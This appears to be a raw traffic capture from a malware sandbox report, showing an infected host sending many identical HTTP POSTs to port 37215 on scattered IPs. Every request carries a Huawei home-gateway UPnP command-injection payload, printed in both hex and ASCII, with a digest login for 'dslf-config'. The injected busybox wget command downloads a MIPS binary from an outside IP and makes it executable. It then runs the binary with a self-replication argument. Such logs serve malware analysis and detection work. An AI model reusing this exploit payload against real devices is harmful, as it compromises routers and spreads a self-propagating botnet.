                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.575381041 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    120192.168.2.1452404157.135.80.17437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.190243006 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.575381041 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    121192.168.2.1437302197.158.255.22237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.198321104 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.611423016 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    122192.168.2.1439262197.225.60.12737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.198321104 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.611423016 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    123192.168.2.1460510157.202.85.9737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.198321104 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.606817007 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    124192.168.2.143575296.209.118.19537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.205832005 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
